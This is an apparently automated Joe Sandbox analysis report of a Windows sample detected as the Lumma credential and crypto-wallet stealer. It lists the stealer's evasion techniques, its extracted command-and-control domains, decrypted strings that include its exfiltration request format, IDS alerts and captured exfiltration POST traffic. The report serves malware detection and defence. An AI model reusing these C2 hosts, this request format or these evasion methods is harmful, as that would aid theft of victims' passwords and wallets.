Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
k7T6akLcAr.exe

Overview

General Information

Sample name:k7T6akLcAr.exe
renamed because original name is a hash value
Original sample name:fccb91d8f4ef18da22c21583c82c56c0.exe
Analysis ID:1581595
MD5:fccb91d8f4ef18da22c21583c82c56c0
SHA1:8c102cc60221c9fc5d83b84c86f70f735d3e8214
SHA256:b98dde6aa8a1e509e9def76dbfc5da5518b52d0b23abbba5525fd7739b8e605b
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • k7T6akLcAr.exe (PID: 6032 cmdline: "C:\Users\user\Desktop\k7T6akLcAr.exe" MD5: FCCB91D8F4EF18DA22C21583C82C56C0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["scentniej.buzz", "cashfuzysao.buzz", "rebuildeso.buzz", "appliacnesot.buzz", "inherineau.buzz", "prisonyfork.buzz", "screwamusresz.buzz", "mindhandru.buzz", "hummskitnj.buzz"], "Build id": "LOGS11--LiveTraffic"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.2310705621.0000000000A9A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: k7T6akLcAr.exe PID: 6032JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: k7T6akLcAr.exe PID: 6032JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T09:40:39.542504+010020283713Unknown Traffic192.168.2.64970823.55.153.106443TCP
              2024-12-28T09:40:41.997663+010020283713Unknown Traffic192.168.2.649711172.67.157.254443TCP
              2024-12-28T09:40:44.043402+010020283713Unknown Traffic192.168.2.649712172.67.157.254443TCP
              2024-12-28T09:40:46.404954+010020283713Unknown Traffic192.168.2.649718172.67.157.254443TCP
              2024-12-28T09:40:48.769334+010020283713Unknown Traffic192.168.2.649724172.67.157.254443TCP
              2024-12-28T09:40:51.149799+010020283713Unknown Traffic192.168.2.649734172.67.157.254443TCP
              2024-12-28T09:40:53.751677+010020283713Unknown Traffic192.168.2.649745172.67.157.254443TCP
              2024-12-28T09:40:56.618003+010020283713Unknown Traffic192.168.2.649752172.67.157.254443TCP
              2024-12-28T09:41:00.510681+010020283713Unknown Traffic192.168.2.649764172.67.157.254443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T09:40:42.754289+010020546531A Network Trojan was detected192.168.2.649711172.67.157.254443TCP
              2024-12-28T09:40:44.806133+010020546531A Network Trojan was detected192.168.2.649712172.67.157.254443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T09:40:42.754289+010020498361A Network Trojan was detected192.168.2.649711172.67.157.254443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T09:40:44.806133+010020498121A Network Trojan was detected192.168.2.649712172.67.157.254443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T09:40:37.482669+010020585721Domain Observed Used for C2 Detected192.168.2.6623731.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T09:40:37.628228+010020585761Domain Observed Used for C2 Detected192.168.2.6593381.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T09:40:37.770258+010020585781Domain Observed Used for C2 Detected192.168.2.6559551.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T09:40:37.187079+010020585801Domain Observed Used for C2 Detected192.168.2.6543881.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T09:40:36.603434+010020585821Domain Observed Used for C2 Detected192.168.2.6514301.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T09:40:36.754966+010020585841Domain Observed Used for C2 Detected192.168.2.6547121.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T09:40:36.898768+010020585861Domain Observed Used for C2 Detected192.168.2.6541941.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T09:40:37.042295+010020585881Domain Observed Used for C2 Detected192.168.2.6527361.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T09:40:37.334435+010020585901Domain Observed Used for C2 Detected192.168.2.6650211.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T09:40:54.892469+010020480941Malware Command and Control Activity Detected192.168.2.649745172.67.157.254443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T09:40:56.694770+010028438641A Network Trojan was detected192.168.2.649752172.67.157.254443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T09:40:40.342216+010028586661Domain Observed Used for C2 Detected192.168.2.64970823.55.153.106443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: k7T6akLcAr.exeAvira: detected
              Antivirus detection for URL or domain
              Source: https://lev-tolstoi.com:443/apingNot_NullproductStateAvira URL Cloud: Label: malware
              Source: https://lev-tolstoi.com/apiFVAvira URL Cloud: Label: malware
              Source: https://lev-tolstoi.com/pi;Avira URL Cloud: Label: malware
              Source: https://lev-tolstoi.com/$$Avira URL Cloud: Label: malware
              Source: https://lev-tolstoi.com/api?Avira URL Cloud: Label: malware
              Source: https://lev-tolstoi.com/api9Avira URL Cloud: Label: malware
              Source: https://lev-tolstoi.com/api3Avira URL Cloud: Label: malware
              Found malware configuration
              Source: k7T6akLcAr.exe.6032.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["scentniej.buzz", "cashfuzysao.buzz", "rebuildeso.buzz", "appliacnesot.buzz", "inherineau.buzz", "prisonyfork.buzz", "screwamusresz.buzz", "mindhandru.buzz", "hummskitnj.buzz"], "Build id": "LOGS11--LiveTraffic"}
              Multi AV Scanner detection for submitted file
              Source: k7T6akLcAr.exeReversingLabs: Detection: 55%
              Source: k7T6akLcAr.exeVirustotal: Detection: 56%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: k7T6akLcAr.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: inherineau.buzz
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: scentniej.buzz
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: mindhandru.buzz
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000003.2144025470.0000000004A40000.00000004.00001000.00020000.00000000.sdmpString decryptor: LOGS11--LiveTraffic
              Source: k7T6akLcAr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.6:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49745 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49752 version: TLS 1.2

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2058578 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) : 192.168.2.6:55955 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058576 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) : 192.168.2.6:59338 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058580 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) : 192.168.2.6:54388 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058572 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) : 192.168.2.6:62373 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058582 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mindhandru .buzz) : 192.168.2.6:51430 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058584 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) : 192.168.2.6:54712 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058586 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) : 192.168.2.6:54194 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058590 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) : 192.168.2.6:65021 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058588 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) : 192.168.2.6:52736 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49712 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49712 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49745 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:49752 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49711 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49711 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49708 -> 23.55.153.106:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: scentniej.buzz
              Source: Malware configuration extractorURLs: cashfuzysao.buzz
              Source: Malware configuration extractorURLs: rebuildeso.buzz
              Source: Malware configuration extractorURLs: appliacnesot.buzz
              Source: Malware configuration extractorURLs: inherineau.buzz
              Source: Malware configuration extractorURLs: prisonyfork.buzz
              Source: Malware configuration extractorURLs: screwamusresz.buzz
              Source: Malware configuration extractorURLs: mindhandru.buzz
              Source: Malware configuration extractorURLs: hummskitnj.buzz
              Source: Joe Sandbox ViewIP Address: 172.67.157.254 172.67.157.254
              Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49745 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49711 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49708 -> 23.55.153.106:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49718 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49724 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49734 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49752 -> 172.67.157.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49764 -> 172.67.157.254:443
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5A1OQ2ITZ8JFW4J4U7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12865Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HKGKVS9PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15051Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=88L03U2R39User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19921Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3M7PF216BJCAA9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1204Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BQB73OBFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570960Host: lev-tolstoi.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: global trafficDNS traffic detected: DNS query: mindhandru.buzz
              Source: global trafficDNS traffic detected: DNS query: prisonyfork.buzz
              Source: global trafficDNS traffic detected: DNS query: rebuildeso.buzz
              Source: global trafficDNS traffic detected: DNS query: scentniej.buzz
              Source: global trafficDNS traffic detected: DNS query: inherineau.buzz
              Source: global trafficDNS traffic detected: DNS query: screwamusresz.buzz
              Source: global trafficDNS traffic detected: DNS query: appliacnesot.buzz
              Source: global trafficDNS traffic detected: DNS query: cashfuzysao.buzz
              Source: global trafficDNS traffic detected: DNS query: hummskitnj.buzz
              Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
              Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
              Source: k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
              Source: k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
              Source: k7T6akLcAr.exe, 00000000.00000003.2307744830.0000000005592000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
              Source: k7T6akLcAr.exe, 00000000.00000003.2307744830.0000000005592000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
              Source: k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
